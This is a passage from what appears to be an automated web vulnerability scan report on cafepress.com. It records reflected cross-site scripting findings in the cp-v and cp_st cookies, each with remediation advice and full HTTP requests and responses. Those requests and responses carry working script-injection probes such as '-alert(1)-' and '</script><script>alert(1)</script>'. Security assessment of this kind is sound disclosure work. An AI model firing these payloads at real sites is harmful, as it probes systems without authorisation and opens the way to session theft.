__utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CP: LVW28 ntCoent-Length: 59443 Date: Sun, 26 Dec 2010 13:47:15 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: cp_st=; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:17:15 GMT; path=/ Set-Cookie: cp_sc=100245; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:17:15 GMT; path=/ Set-Cookie: cppss=3x0; domain=cafepress.com; path=/ Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/ Cache-Control: private Content-Length: 59443 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en"> <head> <meta h...[SNIP]... = 'cafepress.com'; window.cafepress.originCountryCode = 'US' window.cafepress.tealeaf = {}; window.cafepress.tealeaf.pageLandingType = 'SearchResults' window.cafepress.tealeaf.searchTerm = '64dd9</script><script>alert(1)</script>4516792b671 ' window.cafepress.tealeaf.salesChannel = 'Marketplace' window.cafepress.tealeaf.trafficMedium = 'OMM' window.cafepress.tealeaf.utmTracking = '' window.cafepress.tealeaf.abTestString = 'EXP_08_00:C...[SNIP]...
1.38. http://www.cafepress.com/+ipad-cases [cp-v cookie]
Summary
Severity: Information
Confidence: Certain
Host: http://www.cafepress.com
Path: /+ipad-cases
Issue detail
The value of the cp-v cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4658a"-alert(1)-"85663dcf2b1 was submitted in the cp-v cookie. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /+ipad-cases HTTP/1.1 Host: www.cafepress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; 
cp-v=D0026F27AADDAF9A26C54608326FC1BA4658a"-alert(1)-"85663dcf2b1 ; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CP: LVW13 Cteonnt-Length: 88289 Date: Sun, 26 Dec 2010 13:46:48 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: cp_st=; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:16:47 GMT; path=/ Set-Cookie: cp_sc=202454; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:16:47 GMT; path=/ Set-Cookie: cppss=3x0; domain=cafepress.com; path=/ Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/ Cache-Control: private Content-Length: 88289 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en"> <head> <meta h...[SNIP]... 2:T,EXP_10_03:T,EXP_10_04:C,EXP_10_05:T,EXP_10_06:T,EXP_10_07:C,EXP_10_08:C,EXP_10_09:C,EXP_10_10:C,EXP_CB_05_10:T"; s.eVar30 = "A8D8655B7B25F13535D4E6E67BEC27E9:D0026F27AADDAF9A26C54608326FC1BA4658a"-alert(1)-"85663dcf2b1 "; s.eVar26 =(window.om_eVar26?getMyVal(window.om_eVar26, ""): ""); //CafePress PID if (s.eVar26 == "") { if ("" == "affiliate") { s.eVar26 = "2099"; //2099 = affiliate } el...[SNIP]...
1.39. http://www.cafepress.com/+ipad-cases [cp_st cookie]
Summary
Severity: Information
Confidence: Certain
Host: http://www.cafepress.com
Path: /+ipad-cases
Issue detail
The value of the cp_st cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload da017</script><script>alert(1)</script>5b17e49d25b was submitted in the cp_st cookie. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /+ipad-cases HTTP/1.1 Host: www.cafepress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=da017</script><script>alert(1)</script>5b17e49d25b ; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; 
__utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CP: LVW27 ntCoent-Length: 88378 Date: Sun, 26 Dec 2010 13:46:45 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: cp_st=; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:16:45 GMT; path=/ Set-Cookie: cp_sc=202454; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:16:45 GMT; path=/ Set-Cookie: cppss=3x0; domain=cafepress.com; path=/ Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/ Cache-Control: private Content-Length: 88378 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en"> <head> <meta h...[SNIP]... = 'cafepress.com'; window.cafepress.originCountryCode = 'US' window.cafepress.tealeaf = {}; window.cafepress.tealeaf.pageLandingType = 'SearchResults' window.cafepress.tealeaf.searchTerm = 'da017</script><script>alert(1)</script>5b17e49d25b ' window.cafepress.tealeaf.salesChannel = 'Marketplace' window.cafepress.tealeaf.trafficMedium = 'OMM' window.cafepress.tealeaf.utmTracking = '' window.cafepress.tealeaf.abTestString = 'EXP_08_00:C...[SNIP]...
1.40. http://www.cafepress.com/+iphone-cases [cp-v cookie]
Summary
Severity: Information
Confidence: Certain
Host: http://www.cafepress.com
Path: /+iphone-cases
Issue detail
The value of the cp-v cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e1695"-alert(1)-"e836931d7c9 was submitted in the cp-v cookie. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /+iphone-cases HTTP/1.1 Host: www.cafepress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; 
cp-v=D0026F27AADDAF9A26C54608326FC1BAe1695"-alert(1)-"e836931d7c9 ; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CP: LVW15 Cteonnt-Length: 65237 Date: Sun, 26 Dec 2010 13:48:49 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: cp_st=; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:18:49 GMT; path=/ Set-Cookie: cp_sc=202063; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:18:49 GMT; path=/ Set-Cookie: cppss=3x0; domain=cafepress.com; path=/ Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/ Cache-Control: private Content-Length: 65237 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en"> <head> <meta h...[SNIP]... 2:T,EXP_10_03:T,EXP_10_04:C,EXP_10_05:T,EXP_10_06:T,EXP_10_07:C,EXP_10_08:C,EXP_10_09:C,EXP_10_10:C,EXP_CB_05_10:T"; s.eVar30 = "A8D8655B7B25F13535D4E6E67BEC27E9:D0026F27AADDAF9A26C54608326FC1BAe1695"-alert(1)-"e836931d7c9 "; s.eVar26 =(window.om_eVar26?getMyVal(window.om_eVar26, ""): ""); //CafePress PID if (s.eVar26 == "") { if ("" == "affiliate") { s.eVar26 = "2099"; //2099 = affiliate } el...[SNIP]...
1.41. http://www.cafepress.com/+iphone-cases [cp_st cookie]
Summary
Severity: Information
Confidence: Certain
Host: http://www.cafepress.com
Path: /+iphone-cases
Issue detail
The value of the cp_st cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4b572</script><script>alert(1)</script>4f6addec85e was submitted in the cp_st cookie. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /+iphone-cases HTTP/1.1 Host: www.cafepress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=4b572</script><script>alert(1)</script>4f6addec85e ; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; 
__utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CP: LVW17 Cteonnt-Length: 65254 Date: Sun, 26 Dec 2010 13:48:48 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: cp_st=; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:18:48 GMT; path=/ Set-Cookie: cp_sc=202063; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:18:48 GMT; path=/ Set-Cookie: cppss=3x0; domain=cafepress.com; path=/ Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/ Cache-Control: private Content-Length: 65254 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en"> <head> <meta h...[SNIP]... = 'cafepress.com'; window.cafepress.originCountryCode = 'US' window.cafepress.tealeaf = {}; window.cafepress.tealeaf.pageLandingType = 'SearchResults' window.cafepress.tealeaf.searchTerm = '4b572</script><script>alert(1)</script>4f6addec85e ' window.cafepress.tealeaf.salesChannel = 'Marketplace' window.cafepress.tealeaf.trafficMedium = 'SEO' window.cafepress.tealeaf.utmTracking = '' window.cafepress.tealeaf.abTestString = 'EXP_08_00:C...[SNIP]...
1.42. http://www.cafepress.com/+journals [cp-v cookie]
Summary
Severity: Information
Confidence: Certain
Host: http://www.cafepress.com
Path: /+journals
Issue detail
The value of the cp-v cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c2b67"-alert(1)-"894c7ad5c8f was submitted in the cp-v cookie. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /+journals HTTP/1.1
Host: www.cafepress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BAc2b67"-alert(1)-"894c7ad5c8f ; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response
HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CP: LVW15
Cteonnt-Length: 59370
Date: Sun, 26 Dec 2010 13:49:10 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: cp_st=; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:19:10 GMT; path=/
Set-Cookie: cp_sc=100229; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:19:10 GMT; path=/
Set-Cookie: cppss=3x0; domain=cafepress.com; path=/
Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
Cache-Control: private
Content-Length: 59370

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en"> <head> <meta h...[SNIP]... 2:T,EXP_10_03:T,EXP_10_04:C,EXP_10_05:T,EXP_10_06:T,EXP_10_07:C,EXP_10_08:C,EXP_10_09:C,EXP_10_10:C,EXP_CB_05_10:T"; s.eVar30 = "A8D8655B7B25F13535D4E6E67BEC27E9:D0026F27AADDAF9A26C54608326FC1BAc2b67"-alert(1)-"894c7ad5c8f "; s.eVar26 =(window.om_eVar26?getMyVal(window.om_eVar26, ""): ""); //CafePress PID if (s.eVar26 == "") { if ("" == "affiliate") { s.eVar26 = "2099"; //2099 = affiliate } el...[SNIP]...
1.43. http://www.cafepress.com/+journals [cp_st cookie]
Summary
Severity: Information
Confidence: Certain
Host: http://www.cafepress.com
Path: /+journals
Issue detail
